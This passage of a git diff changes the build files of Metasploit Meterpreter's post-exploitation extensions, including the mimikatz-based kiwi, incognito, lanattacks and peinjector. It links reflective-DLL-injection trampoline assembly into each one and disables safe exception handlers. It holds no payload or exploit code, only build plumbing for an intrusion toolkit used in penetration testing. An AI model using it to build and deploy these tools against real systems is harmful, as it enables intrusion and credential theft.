<Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -464,4 +482,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt index d1f4efd06..cd6b8f713 100644 --- a/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_extapi/CMakeLists.txt @@ -43,7 +43,7 @@ if(MSVC) else() endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj index 33891ee83..ef46e556d 100644 --- a/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_extapi/ext_server_extapi.vcxproj @@ -152,6 +152,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -316,6 +319,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -469,6 +475,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\extapi\wmi_interface.h" /> <ClInclude Include="..\..\source\extensions\extapi\wshelpers.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -476,4 +494,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt index 6ad783b10..450af691a 100644 --- a/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_incognito/CMakeLists.txt @@ -30,7 +30,7 @@ if(MSVC) endif() set(LINK_LIBS netapi32 mpr) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj index 18a5b22cd..bee876bdc 100644 --- a/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj +++ b/c/meterpreter/workspace/ext_server_incognito/ext_server_incognito.vcxproj @@ -157,6 +157,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -212,6 +213,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -266,6 +268,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -324,6 +327,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -383,6 +387,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -441,6 +446,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -466,8 +472,20 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\incognito\token_info.h" /> <ClInclude Include="..\..\source\extensions\incognito\user_management.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt index 972c18ba0..89d17f39f 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_kiwi/CMakeLists.txt @@ -46,6 +46,10 @@ else() '-D__success=DISCARD' '-D__FUNCTION__=""' '-D__struct_bcount=DISCARD' + '-D__nullterminated=SAL__nullterminated' + '-D__in_range=__RPC__in_range' + '-D__callback=SAL__callback' + '-D__deref_in_bcount_opt=SAL__deref_in_bcount_opt' ) endif() @@ -136,7 +140,7 @@ set(LINK_LIBS ${KIWI_LIB_DIR}/bcrypt.lib ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj index e3e5b0abe..ea63cc195 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj +++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj @@ -192,6 +192,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -249,6 +250,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -305,6 +307,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -365,6 +368,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -426,6 +430,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -486,6 +491,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -745,6 +751,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\rpc\kull_m_rpc_ms-rprn.h" /> <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sqlite3.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> diff --git a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters index c17462c4f..3edf88046 100644 --- a/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters +++ b/c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters @@ -712,4 +712,8 @@ <UniqueIdentifier>{fdb3471d-bb0a-4de4-95ff-f4f343270ebd}</UniqueIdentifier> </Filter> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm" /> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm" /> + </ItemGroup> </Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt index b8ff489fa..8e79919c9 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_lanattacks/CMakeLists.txt @@ -37,7 +37,7 @@ set(LINK_LIBS ws2_32 ) -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") else() diff --git a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj index 3490dc0ed..3ccfe362e 100644 --- a/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj +++ b/c/meterpreter/workspace/ext_server_lanattacks/ext_server_lanattacks.vcxproj @@ -146,6 +146,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -193,6 +194,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -239,6 +241,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -293,6 +296,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -348,6 +352,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -402,6 +407,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -420,6 +426,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\lanattacks\TFTPserv.h" /> <ClInclude Include="..\..\source\extensions\lanattacks\lanattacks.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -427,4 +445,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline at end of file diff --git a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt index aaa662ae0..69343e417 100644 --- a/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_peinjector/CMakeLists.txt @@ -29,7 +29,7 @@ if(MSVC) set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE) endif() -target_link_libraries(${PROJECT_NAME} ${LINK_LIBS}) +target_link_libraries(${PROJECT_NAME} ${LINK_LIBS} ${MET_RDI_ASM}) if(MSVC) target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070") endif() diff --git a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj index a8a5ce5d1..137fcc1c4 100755 --- a/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj +++ b/c/meterpreter/workspace/ext_server_peinjector/ext_server_peinjector.vcxproj @@ -152,6 +152,7 @@ <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -207,6 +208,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -261,6 +263,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL @@ -316,6 +319,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -372,6 +376,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile> </ProgramDatabaseFile> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -427,6 +432,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(TargetName) <ModuleDefinitionFile>$(ProjectDir)..\..\source\def\extension.def</ModuleDefinitionFile> <AdditionalOptions>/ignore:4070 %(AdditionalOptions)</AdditionalOptions> <ProgramDatabaseFile /> + <ImageHasSafeExceptionHandlers>No</ImageHasSafeExceptionHandlers> </Link> <PostBuildEvent> <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" > NUL @@ -452,6 +458,18 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ClInclude Include="..\..\source\extensions\peinjector\peinjector.h" /> <ClInclude Include="..\..\source\extensions\peinjector\peinjector_bridge.h" /> </ItemGroup> + <ItemGroup> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </MASM> + <MASM Include="..\..\source\ReflectiveDLLInjection\dll\src\GateTrampoline64.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + </MASM> + </ItemGroup> <Choose> <When Condition="'$(Platform)'=='Win32'" /> </Choose> @@ -459,4 +477,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command> <ImportGroup Label="ExtensionTargets"> <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> </ImportGroup> -</Project> +</Project> \ No newline 